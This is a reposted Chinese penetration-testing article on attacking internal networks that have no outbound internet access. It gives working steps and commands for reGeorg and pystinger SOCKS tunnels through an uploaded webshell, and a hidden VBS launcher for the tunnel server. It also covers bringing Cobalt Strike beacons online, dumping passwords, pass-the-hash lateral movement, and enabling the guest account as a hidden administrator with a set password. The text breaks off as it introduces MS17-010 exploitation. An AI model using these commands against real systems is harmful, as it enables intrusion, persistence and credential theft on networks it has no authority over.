内网渗透:不出网渗透技巧

作者:诺言
转载自:https://www.freebuf.com/articles/web/247287.html
前言最近打了几场**,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧 。
socks隧道搭建常用工具:reGeorg,Proxifier
用的比较多的一个隧道代理工具
1、上传对应语言的脚本到目标服务器的网站目录下
内网渗透:不出网渗透技巧

文章插图
 
2、通过浏览器访问上传的脚本文件,显示如下表示成功 。
内网渗透:不出网渗透技巧

文章插图
 
3、本地运行reGeorgSocksProxy.py,-p为指定隧道的端口,-u为刚刚上传的tunnel文件地址 。
Python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php
内网渗透:不出网渗透技巧

文章插图
 
5、成功把本机带入内网 。
内网渗透:不出网渗透技巧

文章插图
 
cs上线cs逐渐成为内网渗透中使用最多的工具,在目标不通外网的情况下,无法直接与公网的cs服务端建立连接 。
pystinger下载地址:https://github.com/FunnyWolf/pystinger
通过webshell实现内网SOCK4代理,端口映射可以使目标不出网情况下在cs上线 。
内网渗透:不出网渗透技巧

文章插图
 
直接使用cs多主机上线方法 。
首先上传对应语言的脚本到网站目录下 。
内网渗透:不出网渗透技巧

文章插图
 
将stinger_server.exe上传到目标服务器
创建stinger_server.vbs文件,示例如下:
Set ws = CreateObject("Wscript.Shell")ws.run "cmd /c D:XXXXXstinger_server.exe 0.0.0.0",vbhide
内网渗透:不出网渗透技巧

文章插图
 

内网渗透:不出网渗透技巧

文章插图
 
把stinger_client上传到公网vps,-w指定proxy的url地址运行 。
chmod 777 stinger_client./stinger_client -w http://x.x.x.x/proxy.jsp -l 0.0.0.0 -p 60000
内网渗透:不出网渗透技巧

文章插图
 

内网渗透:不出网渗透技巧

文章插图
 

内网渗透:不出网渗透技巧

文章插图
 

内网渗透:不出网渗透技巧

文章插图
 
抓取上线的主机密码 。
内网渗透:不出网渗透技巧

文章插图
 
对内网其它主机进行pth攻击,选择刚才建立的监听器 。
内网渗透:不出网渗透技巧

文章插图
 
目标主机成功上线 。
内网渗透:不出网渗透技巧

文章插图
 
坑点:使用过程中cs会话可能假死掉,需要把stinger_server.exe进程结束掉,然后重新启动 。
在目标内网搭建cs服务端如果拿下了目标主机的管理员权限,可以激活guest用户,建立基于http的socks隧道,登录远程桌面,在目标内网搭建cs服务端 。
缺点:被发现概率上升;需要安装JAVA环境;基于web的socks隧道速度很慢,心态容易蹦 。
首先激活guest用户
net user guest/active:yesnet user guest1q2w3e4r@net localgroupadministratorsguest/add
内网渗透:不出网渗透技巧

文章插图
 
上传cs4.0到目标服务器 。
内网渗透:不出网渗透技巧

文章插图
 
运行服务端
teamserver.bat x.x.x.x 1q2w3e4r
内网渗透:不出网渗透技巧

文章插图
 
点击cs.bat运行客户端
内网渗透:不出网渗透技巧

文章插图
 
然后就可以直接在内网操作cs了 。
内网渗透:不出网渗透技巧

文章插图
 
ms17010横向利用内网渗透中常用的攻击手段,随着补丁和杀软的普及,能利用的场景越来越少,而且容易造成目标蓝屏,影响业务,所以谨慎使用 。
之前的利用都是在通外网下情况下利用msf攻击 。
本次在目标不出网的情况下进行利用 。


推荐阅读